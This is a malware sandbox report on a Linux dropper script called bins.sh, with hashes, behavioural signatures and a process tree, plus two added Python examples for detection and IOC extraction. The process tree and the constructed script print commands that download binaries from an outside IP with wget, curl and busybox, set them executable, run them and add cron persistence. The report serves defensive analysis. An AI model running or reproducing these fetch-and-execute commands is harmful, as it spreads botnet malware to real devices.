Analysis
max time kernel: 149s
max time network: 150s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 09-11-2024 14:47
Static task: static1
Behavioral task: behavioral1, sample bins.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2, sample bins.sh, resource debian9-armhf-20240418-en
Behavioral task: behavioral3, sample bins.sh, resource debian9-mipsbe-20240418-en
Behavioral task: behavioral4, sample bins.sh, resource debian9-mipsel-20240611-en
General
Target: bins.sh
Size: 10KB
MD5: 98ea8d25a8c60fccde5438d8bf5ba354
SHA1: 7a43e84359c15813811551a39082b6554f68aa4f
SHA256: 7d5ad7e7a8039897497a1455116d634fce3679e95c41f4d6cd41ec9ae5a5432a
SHA512: f575df135fbcd30f422a6c454e83d15c7013d744655490a4f4212d4a322721a7e058cdb86ff42dce19219c470d03c971b2266aa40bd90ce6a91530c7f3dab1d7
SSDEEP: 192:w/R/1/Iz/zU1ubByo1JC7jUYg8X/Iobss4/R/1/Iz/zRbig8X/IoM1JC7jB:w5dkw1uyo1JC7jUYg8vIobO5dkIg8vIS
Malware Config
Signatures
- Contacts a large (2198) number of remote hosts (1 TTP). This may indicate a network scan to discover remotely running services.
- Creates a large number of network flows (1 TTP). This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTP, 1 IoC). Adversaries may modify file or directory permissions to evade defenses.
  Processes: chmod (PID 1499)
- Executes dropped EXE (1 IoC).
  Processes: /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 1500)
- Renames itself (1 IoC).
  Processes: PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 1501)
- Creates/modifies Cron job (1 TTP, 1 IoC). Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  IoC: file opened for modification /var/spool/cron/crontabs/tmp.mMfH5s by process crontab
- Enumerates running processes. Discovers information about currently running processes on the system.
  IoCs: process PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW opened /proc/<pid>/cmdline for reading for 64 pids: 1622, 1669, 1716, 1727, 26, 1542, 1714, 157, 1573, 1723, 1767, 1136, 1689, 1165, 1719, 89, 167, 1650, 1117, 1522, 1692, 1738, 1783, 2, 409, 1518, 1644, 1630, 1652, 1524, 1603, 1642, 755, 1011, 85, 1742, 595, 1523, 1778, 1574, 29, 1242, 1790, 1038, 1145, 1579, 1599, 902, 1559, 1620, 1677, 1017, 1534, 1616, 1788, 160, 670, 1651, 1610, 1635, 463, 1539, 1582, 1718
- Writes file to tmp directory (3 IoCs). Malware often drops required files in the /tmp directory.
  IoCs: file opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW by wget (PID 1485), curl (PID 1497) and busybox (PID 1498)
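The signatures above are each a single behaviour; what makes this sample a dropper is the combination (payload written to /tmp by a fetch tool, chmod, execution from /tmp, crontab spool modified, and a burst of /proc/<pid>/cmdline reads by the dropped binary). The following Python is an added example of that combined logic, not the sandbox's own rule engine and not part of the original report. The event schema (pid, image, action, target), the `PROC_ENUM_THRESHOLD` of 10 distinct pids, and the `EVENTS` list are assumptions; the event values are constructed from the process names, PIDs and paths visible in this report.

```python
"""Behavioural triage over process events, modelled on the signatures above.

Added example; not the sandbox's own rule engine and not part of the original
report. The event schema (pid, image, action, target) is an assumption; the
event values are constructed from the PIDs and paths in this report.
"""
import re
from collections import defaultdict

BOT = "/tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW"

# Constructed events reproducing the report's chain: three fetchers write the
# payload into /tmp, chmod makes it executable, it runs from /tmp, reads
# /proc/<pid>/cmdline for many pids, and a crontab spool file is modified.
EVENTS = [
    (1485, "/usr/bin/wget",    "file_write", BOT),
    (1497, "/usr/bin/curl",    "file_write", BOT),
    (1498, "/bin/busybox",     "file_write", BOT),
    (1499, "/bin/chmod",       "exec",       "chmod 777 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW"),
    (1500, BOT,                "exec",       "./PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW"),
    (1505, "/usr/bin/crontab", "file_write", "/var/spool/cron/crontabs/tmp.mMfH5s"),
] + [
    (1500, BOT, "file_read", f"/proc/{p}/cmdline")
    for p in (1622, 1669, 1716, 1727, 26, 1542, 1714, 157, 1573, 1723, 1767, 1136)
]

FETCHERS = {"/usr/bin/wget", "/usr/bin/curl", "/bin/busybox"}
CRON_SPOOL = "/var/spool/cron/crontabs/"
PROC_CMDLINE = re.compile(r"^/proc/(\d+)/cmdline$")
# Octal modes granting rwx to some class (777, 755, 700 ...) or a symbolic +x.
CHMOD_EXEC = re.compile(r"\bchmod\s+(?:[0-7]*7[0-7]*|[ugoa]*\+[rwx]*x[rwx]*)\b")
PROC_ENUM_THRESHOLD = 10   # distinct pids whose cmdline one process reads (assumed)

def triage(events):
    """Map each signature name to the sorted list of PIDs that triggered it."""
    hits = defaultdict(set)
    cmdline_reads = defaultdict(set)
    for pid, image, action, target in events:
        if action == "file_write" and image in FETCHERS and target.startswith("/tmp/"):
            hits["Writes file to tmp directory"].add(pid)
        if action == "file_write" and target.startswith(CRON_SPOOL):
            hits["Creates/modifies Cron job"].add(pid)
        if action == "exec" and image == "/bin/chmod" and CHMOD_EXEC.search(target):
            hits["File and Directory Permissions Modification"].add(pid)
        if action == "exec" and image.startswith("/tmp/"):
            hits["Executes dropped EXE"].add(pid)
        if action == "file_read":
            m = PROC_CMDLINE.match(target)
            if m and int(m.group(1)) != pid:   # reading your own cmdline is normal
                cmdline_reads[pid].add(int(m.group(1)))
    for pid, seen in cmdline_reads.items():
        if len(seen) >= PROC_ENUM_THRESHOLD:
            hits["Enumerates running processes"].add(pid)
    return {name: sorted(pids) for name, pids in hits.items()}

# A lone chmod or a lone /tmp write is noise; the whole drop-chmod-exec-persist
# chain is what the verdict keys on.
CHAIN = {"Writes file to tmp directory", "File and Directory Permissions Modification",
         "Executes dropped EXE", "Creates/modifies Cron job"}

def verdict(hits):
    if CHAIN <= set(hits):
        return "malicious"
    return "suspicious" if hits else "clean"

if __name__ == "__main__":
    h = triage(EVENTS)
    for name, pids in h.items():
        print(f"{name}: PIDs {pids}")
    print("verdict:", verdict(h))
```

The threshold on distinct /proc/<pid>/cmdline reads is the tunable part: process managers and monitoring agents also walk /proc, so in production it should be combined with the exec-from-/tmp condition rather than used alone.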
Processes
- /tmp/bins.sh (PID 1483)
  - /bin/rm bins.sh (PID 1484)
  - /usr/bin/wget http://87.120.84.230/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 1485): Writes file to tmp directory
  - /usr/bin/curl -O http://87.120.84.230/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 1497): Writes file to tmp directory
  - /bin/busybox wget http://87.120.84.230/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 1498): Writes file to tmp directory
  - /bin/chmod 777 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 1499): File and Directory Permissions Modification
  - /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW ./PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 1500): Executes dropped EXE; Renames itself; Reads runtime system information
    - /bin/sh -c "crontab -l" (PID 1502)
      - /usr/bin/crontab -l (PID 1503)
    - /bin/sh -c "crontab -" (PID 1504)
      - /usr/bin/crontab - (PID 1505): Creates/modifies Cron job
  - /bin/rm PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW (PID 1507)
  - /usr/bin/wget http://87.120.84.230/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci (PID 1510)
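The process tree shows the dropper's loop in full: fetch one architecture's binary with whichever of wget, curl or busybox exists, chmod 777 it, run it, delete it, then fetch the next one. The Python below is an added example of pulling IOCs out of such a script statically, before any sandbox run; it is not the sample's own code and not part of the original report. The `CONSTRUCTED_BINS_SH` text is constructed to match the command sequence in the tree above (the real bins.sh body is not reproduced on the page, so its exact layout, the `HOST` constant and the record schema are assumptions), and its second line deliberately stops at the fetch, which is as far as the run above got before its time limit.

```python
"""Static IOC extraction from a bins.sh-style dropper.

Added example; not the sample's own code and not part of the original report.
CONSTRUCTED_BINS_SH is built to match the process tree above; the real script
body is not on the page, so its layout is an assumption.
"""
import shlex
from urllib.parse import urlparse

HOST = "87.120.84.230"   # from the process tree; the constant itself is ours
CONSTRUCTED_BINS_SH = f"""
wget http://{HOST}/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW; curl -O http://{HOST}/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW; /bin/busybox wget http://{HOST}/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW; chmod 777 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW; ./PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW; rm PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW
wget http://{HOST}/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci
"""

FETCH_TOOLS = {"wget", "curl"}
SCHEMES = ("http://", "https://", "ftp://", "tftp://")

def _base(path):
    """Last path component: '/bin/busybox' -> 'busybox', './X' -> 'X'."""
    return path.rsplit("/", 1)[-1]

def parse_dropper(text):
    """Return {dropped filename: {url, host, stages}} for every fetched binary.

    'stages' records which of fetch / chmod / exec / rm were seen for that
    filename, so a partially observed loop iteration is still reported.
    """
    records = {}
    for line in text.splitlines():
        for cmd in line.split(";"):
            try:
                argv = shlex.split(cmd)
            except ValueError:          # unbalanced quotes: skip, do not crash
                continue
            if not argv:
                continue
            if _base(argv[0]) == "busybox" and len(argv) > 1:
                argv = argv[1:]         # "/bin/busybox wget URL" -> "wget URL"
            tool = _base(argv[0])
            if argv[0].startswith("./") and tool in records:
                records[tool]["stages"].add("exec")
            elif tool in FETCH_TOOLS:
                for arg in argv[1:]:
                    if arg.startswith(SCHEMES):
                        u = urlparse(arg)
                        rec = records.setdefault(
                            _base(u.path), {"url": arg, "host": u.hostname, "stages": set()})
                        rec["stages"].add("fetch")
            elif tool == "chmod" and len(argv) >= 3:
                for name in argv[2:]:
                    if _base(name) in records:
                        records[_base(name)]["stages"].add("chmod")
            elif tool == "rm":
                for name in argv[1:]:
                    if _base(name) in records:
                        records[_base(name)]["stages"].add("rm")
    return records

def defang(url):
    """hxxp://87[.]120[.]84[.]230/... so the IOC cannot be clicked or auto-fetched."""
    u = urlparse(url)
    return f"{u.scheme.replace('http', 'hxxp')}://{u.hostname.replace('.', '[.]')}{u.path}"

def iocs(records):
    """Hosts, defanged URLs, and the files that went through the full fetch-chmod-exec-rm cycle."""
    full = {"fetch", "chmod", "exec", "rm"}
    return {
        "hosts": sorted({r["host"] for r in records.values()}),
        "urls": sorted(defang(r["url"]) for r in records.values()),
        "executed": sorted(n for n, r in records.items() if full <= r["stages"]),
    }

if __name__ == "__main__":
    recs = parse_dropper(CONSTRUCTED_BINS_SH)
    for name, rec in recs.items():
        print(name, sorted(rec["stages"]))
    print(iocs(recs))
```

Keying the records on the dropped filename rather than the URL is what lets the chmod, exec and rm stages be tied back to the fetch even though those commands never mention the host; the same trick works for `tftp -g -r` style fetches once the tool is added to the dispatch.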
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 112KB
  MD5: 05d7857dcead18bbd86d2935f591873c
  SHA1: 34d18f41ef35f93d5364ce3e24d74730a4e91985
  SHA256: 2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
  SHA512: d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
- Filesize: 210B
  MD5: 2e80a334e05aa20a53af27ec4be2403a
  SHA1: ecb2d49803eaccad994536b0f0fbbdd7ffd31222
  SHA256: 8b47c5f544e3dcb7fc47b705475d4190fcedd3b1ee3703dec7617d42690b6a8e
  SHA512: ce995d1b4cbc676c8f29a49df69c477762b07b008329f0abf5ec8e1cbfa88d0a185ee92b8d1cd8a223bde1d0c477c5b9cbcf442822ac5c73da44817ef44e3b17